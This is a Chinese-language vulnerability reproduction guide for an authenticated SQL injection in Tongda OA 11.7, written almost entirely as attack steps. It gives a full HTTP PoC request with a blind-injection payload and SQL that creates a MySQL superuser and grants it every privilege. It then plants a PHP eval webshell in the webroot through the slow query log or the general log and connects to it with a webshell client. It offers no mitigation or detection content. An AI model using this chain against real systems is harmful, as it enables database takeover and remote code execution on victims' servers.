通達OA 11.7 后台sql注入漏洞復現
一、漏洞描述
通達OA 11.7存在sql注入
二、漏洞影響版本
通達oa 11.7
利用條件:需要賬號登錄
三、漏洞復現
1、下載通達OA 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe,點擊安裝
2、condition_cascade參數存在布爾盲注
POC:
GET /general/hr/manage/query/delete_cascade.php?condition_cascade=select if((substr(user(),1,1)='r'),1,power(9999,99)) HTTP/1.1 Host: 192.168.77.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 X-Requested-With: XMLHttpRequest Referer: http://192.168.77.137/general/index.php?isIE=0&modify_pwd=0 Cookie: PHPSESSID=ebpjtm5tqh5tvida5keba73fr0; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c71fa06d DNT: 1 Connection: close
3、經過測試,過濾了一些函數(sleep、報錯的函數等等),各種注釋,使用payload:select if((1=1),1,power(9999,99))、select if((1=2),1,power(9999,99)),判斷注入點 #當字符相等時,不報錯,錯誤時報錯
4、通過添加用戶at666,密碼為abcABC@123
grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION
5、使用Navicat Premium連接數據庫
6、添加的賬戶不能直接通過日志慢查詢寫入文件,需要給創建的賬戶添加權限
UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('at666' AS Binary(5));
7、然后用注入點刷新權限,因為該用戶是沒有刷新權限的權限的
general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;
8、再次登錄,提示密碼過期,需要重新執行grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION
9、然后寫shell
方法一:
select @@basedir;
set global slow_query_log=on;
set global slow_query_log_file='C:/tongda11.7/webroot/test.php';
select '<?php eval($_POST[x]);?>' or sleep(11);
方法二:
select @@basedir;
set global general_log = on;
set global general_log_file ='C:/tongda11.7/webroot/test2.php';
select '<?php eval($_POST[test2]);?>';
show variables like '%general%';
10、菜刀連接
--------------------------------------------------------------------------------------------
參考:https://mp.weixin.qq.com/s/8rvIT1y_odN2obJ1yAvLbw